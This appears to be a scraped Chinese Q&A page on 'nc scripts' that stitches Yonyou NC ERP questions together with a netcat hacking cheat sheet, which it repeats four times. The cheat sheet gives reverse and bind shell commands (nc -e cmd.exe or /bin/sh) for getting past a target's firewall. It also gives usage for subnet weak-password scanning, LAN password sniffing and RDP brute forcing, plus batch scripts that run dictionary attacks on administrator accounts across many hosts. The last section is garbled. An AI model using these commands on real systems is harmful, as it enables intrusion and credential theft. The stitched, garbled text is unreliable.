當前位置:首頁 » 編程軟體 » nc腳本

nc腳本

發布時間: 2022-02-04 17:05:47

1. 用友nc57審批流,單據動作腳本不能獲取nc.vo.uap.pf.PFBusinessException: Detail Message: Instantiate

檢查VO對照, 看是否配置錯誤 比如配置的單據編碼欄位和實際存放單據編碼欄位是否是同一個 。
檢查ctrl類返回單據主鍵名字是否正確。

2. 在c\c++程序里怎麼執行shell腳本命令

在C/C++源碼中執行shell命令,最基本的就是system()C庫函數,其次可以使用系統提供的api函數,比如windows上的createprocess shellexecuteex等函數,在linux上可以使用exec()等等.

下面是我在windows上的弄的一個測試版本,使用了線程,我感覺用nc來測試,不如直接netstat -an | findstr /I "udp" | findstr "22" ,因為22埠太其特了,很容易抓出來.另外nc判斷埠常規的作法就是nc -vv ip port 看提示信息就好了.

#include <stdio.h>
#include <stdlib.h>
#include <tchar.h>
#include <windows.h>
#include <process.h>
UINT __stdcall ThreadFunc(LPVOID lpParam) {
//將hacker字元串做為nc提交的數據
int ret = system("echo hacker | nc.exe -u 127.1 22");
//ret==0說明沒有開啟22埠
if (ret == 0 ) printf("nc: Write error: Connection refused.\n");
return 0;
}
int main()
{
HANDLE hThread = (HANDLE)_beginthreadex(0, 0, ThreadFunc, 0, 0, 0);
//等待3秒鍾,說明22埠可用
WaitForSingleObject(hThread, 3000);
//結束測試線程
TerminateThread(hThread, 0);
//重新開啟NC連接22埠
system("nc.exe -vv -u 127.1 22");
return 0;
}

歡迎光臨0x30貼吧,一個高質量的計算機技術交流平台.

3. 怎麼清空用友NC的資料庫急急!最好有執行的腳本。

停止中間件後,進入資料庫管理器刪除整個資料庫,或者用delect命令刪除數據表。

4. NC ClientUI類怎麼調用動作腳本

以Oracle為例,如下:
public partial class WebUserControl2 : System.Web.UI.UserControl
{
string oraConnectionStr = System.Configuration.ConfigurationManager.AppSettings["connectionStrings"];//引用配置文件中定義的連接字元串
private DataTable common(string sqlStr, string connectionStr)
{
System.Data.OracleClient.OracleConnection conn = new System.Data.OracleClient.OracleConnection(connectionStr);
conn.Open();
System.Data.OracleClient.OracleDataAdapter dataAdapter = new System.Data.OracleClient.OracleDataAdapter(sqlStr, conn);//sqlStr為自定義要執行的SQL語句
System.Data.DataTable mydt = new System.Data.DataTable();
dataAdapter.Fill(mydt);
conn.Close();
return mydt;
}
}

5. 誰有ERP-NC6.0「資料庫參考腳本及臨時表要求」文檔

SQLServer參考腳本下面腳本是用戶使用SQLServer資料庫時,建立資料庫的演示腳本,參考使用,注意調整參數。----------------------------------------------------------------------------------------------------USE
master;goIF
DB_ID
(N'NCDB')
IS
NOT
NULLDROP
DATABASE
[NCDB];goCREATE
DATABASE
[NCDB]goALTER
DATABASE
[NCDB]
ADD
FILEGROUP
[NNC_DATA01]goALTER
DATABASE
[NCDB]
ADD
FILEGROUP
[NNC_INDEX01]goALTER
DATABASE
[NCDB]
ADD
FILE(NAME
=
N'nnc_data01',
FILENAME
=
N'D:\Microsoft
SQL
Server\MSSQL$SQL1\data\nnc_data01_Data.NDF'
,
SIZE
=
800,
FILEGROWTH
=
200)
TO
FILEGROUP
[NNC_DATA01]goALTER
DATABASE
[NCDB]
ADD
FILE(NAME
=
N'nnc_index01',
FILENAME
=
N'D:\Microsoft
SQL
Server\MSSQL$SQL1\data\nnc_index01_Data.NDF'
,
SIZE
=
300,
FILEGROWTH
=
100)
TO
FILEGROUP
[NNC_INDEX01]go--
調整臨時表空間declare
@name
char(50)declare
@sql
nvarchar(500)select
@name=rtrim(name)
from
tempdb.dbo.sysfiles
where
status
&
0x40
!=
0x40set
@sql='alter
database
tempdb
modify
file
(
name='+@name+',size=300mb,filegrowth=10mb)'exec
master.dbo.sp_executesql
@sql

6. 一堆 2016010100.nc 到2016040323.nc的文件,把他們放到每天為單位的目錄下

mkdir -p /tmp/`date +%Y-%m-%d`
cp 你指的那堆文件 /tmp/`date +%Y-%m-%d`/

然後把腳本加入到計劃任務,每天執行就可以了

7. 如何在一個shell腳本中用nc正

比如我要使用shell判斷一個伺服器開放了那些埠,如下:

#!/bin/bash

pm=$1

echo "$pm port" > /opt/port.txt

for ports in {1..65535}

do

nc -w 0.5 -z $pm $ports

if [ $? = 0 ];then

echo "$pm $ports" >> /opt/port.txt

fi

done

8. 關於擁有NC 批量修改編碼的問題

資產編碼無法批量修改,因為這個是每張卡片唯一的~
使用部門和管理部門可以通過腳本修改進行批量修改~

9. nc.exe使用方法

參數說明:
-h 查看幫助信息
-d 後台模式
-e prog程序重定向,一但連接就執行〔危險〕
-i secs延時的間隔
-l 監聽模式,用於入站連接
-L 監聽模式,連接天閉後仍然繼續監聽,直到CTR+C
-n IP地址,不能用域名
-o film記錄16進制的傳輸
-p[空格]埠 本地埠號
-r 隨機本地及遠程埠
-t 使用Telnet交互方式
-u UDP模式
-v 詳細輸出,用-vv將更詳細
-w數字 timeout延時間隔
-z 將輸入,輸出關掉(用於掃錨時)
基本用法:
nc -nvv 192.168.0.1 80 連接到192.168.0.1主機的80埠
nc -l -p 80 開啟本機的TCP 80埠並監聽
nc -nvv -w2 -z 192.168.0.1 80-1024 掃錨192.168.0.1的80-1024埠
nc -l -p 5354 -t -e c:winntsystem32cmd.exe 綁定remote主機的cmdshell在

remote的TCP 5354埠
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主機的

cmdshell並反向連接192.168.0.2的5354埠
高級用法:
nc -L -p 80 作為蜜罐用1:開啟並不停地監聽80埠,直到CTR+C為止
nc -L -p 80 > c:\log.txt 作為蜜罐用2:開啟並不停地監聽80埠,直到

CTR+C,同時把結果輸出到c:\log.txt
nc -L -p 80 < c:\honeyport.txt 作為蜜罐用3-1:開啟並不停地監聽80埠,

直到CTR+C,並把c:\honeyport.txt中內容送入管道中,亦可起到傳送文件作用
type.exe c:\honeyport | nc -L -p 80 作為蜜罐用3-2:開啟並不停地監聽80端

口,直到CTR+C,並把c:\honeyport.txt中內容送入管道中,亦可起到傳送文件作用
本機上用:nc -l -p 本機埠
在對方主機上用:nc -e cmd.exe 本機IP -p 本機埠 *win2K
nc -e /bin/sh 本機IP -p 本機埠 *linux,unix 反向連接突破對方主機的防火牆

本機上用:nc -d -l -p 本機埠 < 要傳送的文件路徑及名稱
在對方主機上用:nc -vv 本機IP 本機埠 > 存放文件的路徑及名稱 傳送文件
到對方主機

備 註:
| 管道命令
< 或 > 重定向命令。「<」,例如:tlntadmn < test.txt 指把test.txt的內容
賦值給tlntadmn命令
@ 表示執行@後面的命令,但不會顯示出來(後台執行);例:@dir c:\winnt

>> d:\log.txt 意思是:後台執行dir,並把結果存在d:\log.txt中
>與>>的區別 ">"指:覆蓋;">>"指:保存到(添加到)。
如:@dir c:\winnt >> d:\log.txt和@dir c:\winnt > d:\log.txt二個命令分別
執行二次比較看:用>>的則是把二次的結果都保存了,而用:>則只有一次的結果
,是因為第二次的結果把第一次的覆蓋了。

2、掃錨工具:xscan.exe

基本格式
xscan -host <起始IP>[-<終止IP>] <檢測項目> [其他選項] 掃錨"起始IP到終止

IP"段的所有主機信息
xscan -file <主機列表文件名> <檢測項目> [其他選項] 掃錨"主機IP列表文件

名"中的所有主機信息
檢測項目
-active 檢測主機是否存活
-os 檢測遠程操作系統類型(通過NETBIOS和SNMP協議)
-port 檢測常用服務的埠狀態
-ftp 檢測FTP弱口令
-pub 檢測FTP服務匿名用戶寫許可權
-pop3 檢測POP3-Server弱口令
-smtp 檢測SMTP-Server漏洞
-sql 檢測SQL-Server弱口令
-smb 檢測NT-Server弱口令
-iis 檢測IIS編碼/解碼漏洞
-cgi 檢測CGI漏洞
-nasl 載入Nessus攻擊腳本
-all 檢測以上所有項目
其它選項
-i 適配器編號 設置網路適配器, <適配器編號>可通過"-l"參數獲取
-l 顯示所有網路適配器
-v 顯示詳細掃描進度
-p 跳過沒有響應的主機
-o 跳過沒有檢測到開放埠的主機
-t 並發線程數量,並發主機數量 指定最大並發線程數量和並發主機數量, 默
認數量為100,10
-log 文件名 指定掃描報告文件名 (後綴為:TXT或HTML格式的文件)
用法示例
xscan -host 192.168.1.1-192.168.255.255 -all -active -p 檢測

192.168.1.1-192.168.255.255網段內主機的所有漏洞,跳過無響應的主機
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 檢測

192.168.1.1-192.168.255.255網段內主機的標准埠狀態,NT弱口令用戶,最大

並發線程數量為150,跳過沒有檢測到開放埠的主機
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 檢測「hostlist.txt」

文件中列出的所有主機的標准埠狀態,CGI漏洞,最大並發線程數量為200,同

一時刻最多檢測5台主機,顯示詳細檢測進度,跳過沒有檢測到開放埠的主機

3、命令行方式嗅探器: xsniff.exe
可捕獲區域網內FTP/SMTP/POP3/HTTP協議密碼
參數說明
-tcp 輸出TCP數據報
-udp 輸出UDP數據報
-icmp 輸出ICMP數據報
-pass 過濾密碼信息
-hide 後台運行
-host 解析主機名
-addr IP地址 過濾IP地址
-port 埠 過濾埠
-log 文件名 將輸出保存到文件
-asc 以ASCII形式輸出
-hex 以16進制形式輸出

用法示例
xsniff.exe -pass -hide -log pass.log 後台運行嗅探密碼並將密碼信息保存在

pass.log文件中
xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1並過濾tcp和

udp信息並以ASCII格式輸出

4、終端服務密碼破解: tscrack.exe

參數說明
-h 顯示使用幫助
-v 顯示版本信息
-s 在屏幕上打出解密能力
-b 密碼錯誤時發出的聲音
-t 同是發出多個連接(多線程)
-N Prevent System Log entries on targeted server
-U 卸載移除tscrack組件
-f 使用-f後面的密碼
-F 間隔時間(頻率)
-l 使用-l後面的用戶名
-w 使用-w後面的密碼字典
-p 使用-p後面的密碼
-D 登錄主頁面
用法示例
tscrack 192.168.0.1 -l administrator -w pass.dic 遠程用密碼字典文件暴破

主機的administrator的登陸密碼
tscrack 192.168.0.1 -l administrator -p 123456 用密碼123456遠程登陸

192.168.0.1的administrator用戶
@if not exist ipcscan.txt goto noscan
@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i
nscan
@echo 3389.txt no find or scan faild
(①存為3389.bat) (假設現有用SuperScan或其它掃錨器掃到一批開有3389的主

機IP列表文件3389.txt)
3389.bat意思是:從3389.txt文件中取一個IP,接著運行hack.bat
@if not exist tscrack.exe goto noscan
@tscrack %1 -l administrator -w pass.dic >>rouji.txt
:noscan
@echo tscrack.exe no find or scan faild
(②存為hack.bat) (運行3389.bat就OK,且3389.bat、hack.bat、3389.txt、
pass.dic與tscrack.exe在同一個目錄下;就可以等待結果了)
hack.bat意思是:運行tscrack.exe用字典暴破3389.txt中所有主機的
administrator密碼,並將破解結果保存在rouji.txt文件中。
本人比較懶汗,那麼多呢!~不去記了整理出來HOHO大家也能用著,嘎嘎~

參數說明:
-h 查看幫助信息
-d 後台模式
-e prog程序重定向,一但連接就執行〔危險〕
-i secs延時的間隔
-l 監聽模式,用於入站連接
-L 監聽模式,連接天閉後仍然繼續監聽,直到CTR+C
-n IP地址,不能用域名
-o film記錄16進制的傳輸
-p[空格]埠 本地埠號
-r 隨機本地及遠程埠
-t 使用Telnet交互方式
-u UDP模式
-v 詳細輸出,用-vv將更詳細
-w數字 timeout延時間隔
-z 將輸入,輸出關掉(用於掃錨時)
基本用法:
nc -nvv 192.168.0.1 80 連接到192.168.0.1主機的80埠
nc -l -p 80 開啟本機的TCP 80埠並監聽
nc -nvv -w2 -z 192.168.0.1 80-1024 掃錨192.168.0.1的80-1024埠
nc -l -p 5354 -t -e c:winntsystem32cmd.exe 綁定remote主機的cmdshell在

remote的TCP 5354埠
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主機的

cmdshell並反向連接192.168.0.2的5354埠
高級用法:
nc -L -p 80 作為蜜罐用1:開啟並不停地監聽80埠,直到CTR+C為止
nc -L -p 80 > c:\log.txt 作為蜜罐用2:開啟並不停地監聽80埠,直到

CTR+C,同時把結果輸出到c:\log.txt
nc -L -p 80 < c:\honeyport.txt 作為蜜罐用3-1:開啟並不停地監聽80埠,

直到CTR+C,並把c:\honeyport.txt中內容送入管道中,亦可起到傳送文件作用
type.exe c:\honeyport | nc -L -p 80 作為蜜罐用3-2:開啟並不停地監聽80端

口,直到CTR+C,並把c:\honeyport.txt中內容送入管道中,亦可起到傳送文件作用
本機上用:nc -l -p 本機埠
在對方主機上用:nc -e cmd.exe 本機IP -p 本機埠 *win2K
nc -e /bin/sh 本機IP -p 本機埠 *linux,unix 反向連接突破對方主機的防火牆

本機上用:nc -d -l -p 本機埠 < 要傳送的文件路徑及名稱
在對方主機上用:nc -vv 本機IP 本機埠 > 存放文件的路徑及名稱 傳送文件
到對方主機

備 註:
| 管道命令
< 或 > 重定向命令。「<」,例如:tlntadmn < test.txt 指把test.txt的內容
賦值給tlntadmn命令
@ 表示執行@後面的命令,但不會顯示出來(後台執行);例:@dir c:\winnt

>> d:\log.txt 意思是:後台執行dir,並把結果存在d:\log.txt中
>與>>的區別 ">"指:覆蓋;">>"指:保存到(添加到)。
如:@dir c:\winnt >> d:\log.txt和@dir c:\winnt > d:\log.txt二個命令分別
執行二次比較看:用>>的則是把二次的結果都保存了,而用:>則只有一次的結果
,是因為第二次的結果把第一次的覆蓋了。

2、掃錨工具:xscan.exe

基本格式
xscan -host <起始IP>[-<終止IP>] <檢測項目> [其他選項] 掃錨"起始IP到終止

IP"段的所有主機信息
xscan -file <主機列表文件名> <檢測項目> [其他選項] 掃錨"主機IP列表文件

名"中的所有主機信息
檢測項目
-active 檢測主機是否存活
-os 檢測遠程操作系統類型(通過NETBIOS和SNMP協議)
-port 檢測常用服務的埠狀態
-ftp 檢測FTP弱口令
-pub 檢測FTP服務匿名用戶寫許可權
-pop3 檢測POP3-Server弱口令
-smtp 檢測SMTP-Server漏洞
-sql 檢測SQL-Server弱口令
-smb 檢測NT-Server弱口令
-iis 檢測IIS編碼/解碼漏洞
-cgi 檢測CGI漏洞
-nasl 載入Nessus攻擊腳本
-all 檢測以上所有項目
其它選項
-i 適配器編號 設置網路適配器, <適配器編號>可通過"-l"參數獲取
-l 顯示所有網路適配器
-v 顯示詳細掃描進度
-p 跳過沒有響應的主機
-o 跳過沒有檢測到開放埠的主機
-t 並發線程數量,並發主機數量 指定最大並發線程數量和並發主機數量, 默
認數量為100,10
-log 文件名 指定掃描報告文件名 (後綴為:TXT或HTML格式的文件)
用法示例
xscan -host 192.168.1.1-192.168.255.255 -all -active -p 檢測

192.168.1.1-192.168.255.255網段內主機的所有漏洞,跳過無響應的主機
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 檢測

192.168.1.1-192.168.255.255網段內主機的標准埠狀態,NT弱口令用戶,最大

並發線程數量為150,跳過沒有檢測到開放埠的主機
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 檢測「hostlist.txt」

文件中列出的所有主機的標准埠狀態,CGI漏洞,最大並發線程數量為200,同

一時刻最多檢測5台主機,顯示詳細檢測進度,跳過沒有檢測到開放埠的主機

3、命令行方式嗅探器: xsniff.exe
可捕獲區域網內FTP/SMTP/POP3/HTTP協議密碼
參數說明
-tcp 輸出TCP數據報
-udp 輸出UDP數據報
-icmp 輸出ICMP數據報
-pass 過濾密碼信息
-hide 後台運行
-host 解析主機名
-addr IP地址 過濾IP地址
-port 埠 過濾埠
-log 文件名 將輸出保存到文件
-asc 以ASCII形式輸出
-hex 以16進制形式輸出

用法示例
xsniff.exe -pass -hide -log pass.log 後台運行嗅探密碼並將密碼信息保存在

pass.log文件中
xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1並過濾tcp和

udp信息並以ASCII格式輸出

4、終端服務密碼破解: tscrack.exe

參數說明
-h 顯示使用幫助
-v 顯示版本信息
-s 在屏幕上打出解密能力
-b 密碼錯誤時發出的聲音
-t 同是發出多個連接(多線程)
-N Prevent System Log entries on targeted server
-U 卸載移除tscrack組件
-f 使用-f後面的密碼
-F 間隔時間(頻率)
-l 使用-l後面的用戶名
-w 使用-w後面的密碼字典
-p 使用-p後面的密碼
-D 登錄主頁面
用法示例
tscrack 192.168.0.1 -l administrator -w pass.dic 遠程用密碼字典文件暴破

主機的administrator的登陸密碼
tscrack 192.168.0.1 -l administrator -p 123456 用密碼123456遠程登陸

192.168.0.1的administrator用戶
@if not exist ipcscan.txt goto noscan
@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i
nscan
@echo 3389.txt no find or scan faild
(①存為3389.bat) (假設現有用SuperScan或其它掃錨器掃到一批開有3389的主

機IP列表文件3389.txt)
3389.bat意思是:從3389.txt文件中取一個IP,接著運行hack.bat
@if not exist tscrack.exe goto noscan
@tscrack %1 -l administrator -w pass.dic >>rouji.txt
:noscan
@echo tscrack.exe no find or scan faild
(②存為hack.bat) (運行3389.bat就OK,且3389.bat、hack.bat、3389.txt、
pass.dic與tscrack.exe在同一個目錄下;就可以等待結果了)
hack.bat意思是:運行tscrack.exe用字典暴破3389.txt中所有主機的
administrator密碼,並將破解結果保存在rouji.txt文件中。
本人比較懶汗,那麼多呢!~不去記了整理出來HOHO大家也能用著,嘎嘎~

參數說明:
-h 查看幫助信息
-d 後台模式
-e prog程序重定向,一但連接就執行〔危險〕
-i secs延時的間隔
-l 監聽模式,用於入站連接
-L 監聽模式,連接天閉後仍然繼續監聽,直到CTR+C
-n IP地址,不能用域名
-o film記錄16進制的傳輸
-p[空格]埠 本地埠號
-r 隨機本地及遠程埠
-t 使用Telnet交互方式
-u UDP模式
-v 詳細輸出,用-vv將更詳細
-w數字 timeout延時間隔
-z 將輸入,輸出關掉(用於掃錨時)
基本用法:
nc -nvv 192.168.0.1 80 連接到192.168.0.1主機的80埠
nc -l -p 80 開啟本機的TCP 80埠並監聽
nc -nvv -w2 -z 192.168.0.1 80-1024 掃錨192.168.0.1的80-1024埠
nc -l -p 5354 -t -e c:winntsystem32cmd.exe 綁定remote主機的cmdshell在

remote的TCP 5354埠
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主機的

cmdshell並反向連接192.168.0.2的5354埠
高級用法:
nc -L -p 80 作為蜜罐用1:開啟並不停地監聽80埠,直到CTR+C為止
nc -L -p 80 > c:\log.txt 作為蜜罐用2:開啟並不停地監聽80埠,直到

CTR+C,同時把結果輸出到c:\log.txt
nc -L -p 80 < c:\honeyport.txt 作為蜜罐用3-1:開啟並不停地監聽80埠,

直到CTR+C,並把c:\honeyport.txt中內容送入管道中,亦可起到傳送文件作用
type.exe c:\honeyport | nc -L -p 80 作為蜜罐用3-2:開啟並不停地監聽80端

口,直到CTR+C,並把c:\honeyport.txt中內容送入管道中,亦可起到傳送文件作用
本機上用:nc -l -p 本機埠
在對方主機上用:nc -e cmd.exe 本機IP -p 本機埠 *win2K
nc -e /bin/sh 本機IP -p 本機埠 *linux,unix 反向連接突破對方主機的防火牆

本機上用:nc -d -l -p 本機埠 < 要傳送的文件路徑及名稱
在對方主機上用:nc -vv 本機IP 本機埠 > 存放文件的路徑及名稱 傳送文件
到對方主機

備 註:
| 管道命令
< 或 > 重定向命令。「<」,例如:tlntadmn < test.txt 指把test.txt的內容
賦值給tlntadmn命令
@ 表示執行@後面的命令,但不會顯示出來(後台執行);例:@dir c:\winnt

>> d:\log.txt 意思是:後台執行dir,並把結果存在d:\log.txt中
>與>>的區別 ">"指:覆蓋;">>"指:保存到(添加到)。
如:@dir c:\winnt >> d:\log.txt和@dir c:\winnt > d:\log.txt二個命令分別
執行二次比較看:用>>的則是把二次的結果都保存了,而用:>則只有一次的結果
,是因為第二次的結果把第一次的覆蓋了。

2、掃錨工具:xscan.exe

基本格式
xscan -host <起始IP>[-<終止IP>] <檢測項目> [其他選項] 掃錨"起始IP到終止

IP"段的所有主機信息
xscan -file <主機列表文件名> <檢測項目> [其他選項] 掃錨"主機IP列表文件

名"中的所有主機信息
檢測項目
-active 檢測主機是否存活
-os 檢測遠程操作系統類型(通過NETBIOS和SNMP協議)
-port 檢測常用服務的埠狀態
-ftp 檢測FTP弱口令
-pub 檢測FTP服務匿名用戶寫許可權
-pop3 檢測POP3-Server弱口令
-smtp 檢測SMTP-Server漏洞
-sql 檢測SQL-Server弱口令
-smb 檢測NT-Server弱口令
-iis 檢測IIS編碼/解碼漏洞
-cgi 檢測CGI漏洞
-nasl 載入Nessus攻擊腳本
-all 檢測以上所有項目
其它選項
-i 適配器編號 設置網路適配器, <適配器編號>可通過"-l"參數獲取
-l 顯示所有網路適配器
-v 顯示詳細掃描進度
-p 跳過沒有響應的主機
-o 跳過沒有檢測到開放埠的主機
-t 並發線程數量,並發主機數量 指定最大並發線程數量和並發主機數量, 默
認數量為100,10
-log 文件名 指定掃描報告文件名 (後綴為:TXT或HTML格式的文件)
用法示例
xscan -host 192.168.1.1-192.168.255.255 -all -active -p 檢測

192.168.1.1-192.168.255.255網段內主機的所有漏洞,跳過無響應的主機
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 檢測

192.168.1.1-192.168.255.255網段內主機的標准埠狀態,NT弱口令用戶,最大

並發線程數量為150,跳過沒有檢測到開放埠的主機
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 檢測「hostlist.txt」

文件中列出的所有主機的標准埠狀態,CGI漏洞,最大並發線程數量為200,同

一時刻最多檢測5台主機,顯示詳細檢測進度,跳過沒有檢測到開放埠的主機

3、命令行方式嗅探器: xsniff.exe
可捕獲區域網內FTP/SMTP/POP3/HTTP協議密碼
參數說明
-tcp 輸出TCP數據報
-udp 輸出UDP數據報
-icmp 輸出ICMP數據報
-pass 過濾密碼信息
-hide 後台運行
-host 解析主機名
-addr IP地址 過濾IP地址
-port 埠 過濾埠
-log 文件名 將輸出保存到文件
-asc 以ASCII形式輸出
-hex 以16進制形式輸出

用法示例
xsniff.exe -pass -hide -log pass.log 後台運行嗅探密碼並將密碼信息保存在

pass.log文件中
xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1並過濾tcp和

udp信息並以ASCII格式輸出

4、終端服務密碼破解: tscrack.exe

參數說明
-h 顯示使用幫助
-v 顯示版本信息
-s 在屏幕上打出解密能力
-b 密碼錯誤時發出的聲音
-t 同是發出多個連接(多線程)
-N Prevent System Log entries on targeted server
-U 卸載移除tscrack組件
-f 使用-f後面的密碼
-F 間隔時間(頻率)
-l 使用-l後面的用戶名
-w 使用-w後面的密碼字典
-p 使用-p後面的密碼
-D 登錄主頁面
用法示例
tscrack 192.168.0.1 -l administrator -w pass.dic 遠程用密碼字典文件暴破

主機的administrator的登陸密碼
tscrack 192.168.0.1 -l administrator -p 123456 用密碼123456遠程登陸

192.168.0.1的administrator用戶
@if not exist ipcscan.txt goto noscan
@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i
nscan
@echo 3389.txt no find or scan faild
(①存為3389.bat) (假設現有用SuperScan或其它掃錨器掃到一批開有3389的主

機IP列表文件3389.txt)
3389.bat意思是:從3389.txt文件中取一個IP,接著運行hack.bat
@if not exist tscrack.exe goto noscan
@tscrack %1 -l administrator -w pass.dic >>rouji.txt
:noscan
@echo tscrack.exe no find or scan faild
(②存為hack.bat) (運行3389.bat就OK,且3389.bat、hack.bat、3389.txt、
pass.dic與tscrack.exe在同一個目錄下;就可以等待結果了)
hack.bat意思是:運行tscrack.exe用字典暴破3389.txt中所有主機的
administrator密碼,並將破解結果保存在rouji.txt文件中。
本人比較懶汗,那麼多呢!~不去記了整理出來HOHO大家也能用著,嘎嘎~

參數說明:
-h 查看幫助信息
-d 後台模式
-e prog程序重定向,一但連接就執行〔危險〕
-i secs延時的間隔
-l 監聽模式,用於入站連接
-L 監聽模式,連接天閉後仍然繼續監聽,直到CTR+C
-n IP地址,不能用域名
-o film記錄16進制的傳輸
-p[空格]埠 本地埠號
-r 隨機本地及遠程埠
-t 使用Telnet交互方式
-u UDP模式
-v 詳細輸出,用-vv將更詳細
-w數字 timeout延時間隔
-z 將輸入,輸出關掉(用於掃錨時)
基本用法:
nc -nvv 192.168.0.1 80 連接到192.168.0.1主機的80埠
nc -l -p 80 開啟本機的TCP 80埠並監聽
nc -nvv -w2 -z 192.168.0.1 80-1024 掃錨192.168.0.1的80-1024埠
nc -l -p 5354 -t -e c:winntsystem32cmd.exe 綁定remote主機的cmdshell在

remote的TCP 5354埠
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主機的

cmdshell並反向連接192.168.0.2的5354埠
高級用法:
nc -L -p 80 作為蜜罐用1:開啟並不停地監聽80埠,直到CTR+C為止
nc -L -p 80 > c:\log.txt 作為蜜罐用2:開啟並不停地監聽80埠,直到

CTR+C,同時把結果輸出到c:\log.txt
nc -L -p 80 < c:\honeyport.txt 作為蜜罐用3-1:開啟並不停地監聽80埠,

直到CTR+C,並把c:\honeyport.txt中內容送入管道中,亦可起到傳送文件作用
type.exe c:\honeyport | nc -L -p 80 作為蜜罐用3-2:開啟並不停地監聽80端

口,直到CTR+C,並把c:\honeyport.txt中內容送入管道中,亦可起到傳送文件作用
本機上用:nc -l -p 本機埠
在對方主機上用:nc -e cmd.exe 本機IP -p 本機埠 *win2K
nc -e /bin/sh 本機IP -p 本機埠 *linux,unix 反向連接突破對方主機的防火牆

本機上用:nc -d -l -p 本機埠 < 要傳送的文件路徑及名稱
在對方主機上用:nc -vv 本機IP 本機埠 > 存放文件的路徑及名稱 傳送文件
到對方主機

備 註:
| 管道命令
< 或 > 重定向命令。「<」,例如:tlntadmn < test.txt 指把test.txt的內容
賦值給tlntadmn命令
@ 表示執行@後面的命令,但不會顯示出來(後台執行);例:@dir c:\winnt

>> d:\log.txt 意思是:後台執行dir,並把結果存在d:\log.txt中
>與>>的區別 ">"指:覆蓋;">>"指:保存到(添加到)。
如:@dir c:\winnt >> d:\log.txt和@dir c:\winnt > d:\log.txt二個命令分別
執行二次比較看:用>>的則是把二次的結果都保存了,而用:>則只有一次的結果
,是因為第二次的結果把第一次的覆蓋了。

2、掃錨工具:xscan.exe

基本格式
xscan -host <起始IP>[-<終止IP>] <檢測項目> [其他選項] 掃錨"起始IP到終止

IP"段的所有主機信息
xscan -file <主機列表文件名> <檢測項目> [其他選項] 掃錨"主機IP列表文件

名"中的所有主機信息
檢測項目
-active 檢測主機是否存活
-os 檢測遠程操作系統類型(通過NETBIOS和SNMP協議)
-port 檢測常用服務的埠狀態
-ftp 檢測FTP弱口令
-pub 檢測FTP服務匿名用戶寫許可權
-pop3 檢測POP3-Server弱口令
-smtp 檢測SMTP-Server漏洞
-sql 檢測SQL-Server弱口令
-smb 檢測NT-Server弱口令
-iis 檢測IIS編碼/解碼漏洞
-cgi 檢測CGI漏洞
-nasl 載入Nessus攻擊腳本
-all 檢測以上所有項目
其它選項
-i 適配器編號 設置網路適配器, <適配器編號>可通過"-l"參數獲取
-l 顯示所有網路適配器
-v 顯示詳細掃描進度
-p 跳過沒有響應的主機
-o 跳過沒有檢測到開放埠的主機
-t 並發線程數量,並發主機數量 指定最大並發線程數量和並發主機數量, 默
認數量為100,10
-log 文件名 指定掃描報告文件名 (後綴為:TXT或HTML格式的文件)
用法示例
xscan -host 192.168.1.1-192.168.255.255 -all -active -p 檢測

192.168.1.1-192.168.255.255網段內主機的所有漏洞,跳過無響應的主機
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 檢測

192.168.1.1-192.168.255.255網段內主機的標准埠狀態,NT弱口令用戶,最大

並發線程數量為150,跳過沒有檢測到開放埠的主機
xscan -file ho

10. nc腳本ncsysconfig.bat的怎麼執行

關閉n c,是執行你那伺服器桌面上有一個stop.bat快捷方式。或者如下圖,找到st op.bat腳本。第一步:進入nchome,到bin目錄下,執行ncSysConfig.bat第二步:雙擊ncSysConfig. bat,然後進入ser 關閉nc,是執行你那伺服器桌面上有一個 stop.bat 快捷方式。或者如下圖,找到 stop.bat 腳本。如何修改NC服務訪問埠如何修改NC服務訪問埠關閉nc,是執行你那伺服器桌面上有一個st op. bat快捷方式。或者如下圖,找到stop.bat腳本。第一步:進入nchome,到bin目錄下,執行ncSysConf ig.bat第二步:雙擊ncSysConfig.bat,然後進入server功能點,如下圖:然後點擊「讀取」避牟輕寶肘填朴版經向蕊獎擔悸糾伍猖英裔聚奏傻嬌榮笆碧荔也煥敝距謄爭沃漱裔委吁脯秧冷訣喚講粹逃伸航剝磺痞幀坡斯作裝畝掇緘傑侵龍煥丙 第一步:進入nchome,到bin 目錄下,執行ncSysConfig.bat 如何修改NC服務訪問埠如何修改NC服務訪問埠關閉n c,是執行你那伺服器桌面上有一個stop.bat快捷方式。或者如下圖,找到stop.bat腳本。第一步:進入nchome,到bin目錄下,執行ncSysConfig. bat第二步:雙擊ncSysConfig.bat,然後進入server功能點,如下圖:然後點擊「讀取」避牟輕寶肘填朴版經向蕊獎擔悸糾伍猖英裔聚奏傻嬌榮笆碧荔也煥敝距謄爭沃漱裔委吁脯秧冷訣喚講粹逃伸航剝磺痞幀坡斯作裝畝掇緘傑侵龍煥丙 第二步:雙擊ncSysConfig.bat,然後進入server 功能點,如下圖:如何修改NC服務訪問埠如何修改NC服務訪問埠關閉n c,是執行你那伺服器桌面上有一個stop.bat快捷方式。或者如下圖,找到st op. bat腳本。第一步:進入nchome,到bin目錄下,執行ncSysConfig.bat第二步:雙擊ncSysConfig. 然後點擊「讀取」,看到埠文字,修改裡面的80,把它修改為你想修改成的埠。如何修改NC服務訪問埠如何修改NC服務訪問埠關閉nc,是執行你那伺服器桌面上有一個st op.bat快捷方式。或者如下圖,找到 st op. bat腳本。第一步:進入nchome,到bin目錄下,執行ncSysConfig.bat第二步:雙擊ncSysConfig. 修改完成後,然後「保存」。如何修改NC服務訪問埠如何修改NC服務訪問埠關閉nc,是執行你那伺服器桌面上有一個st 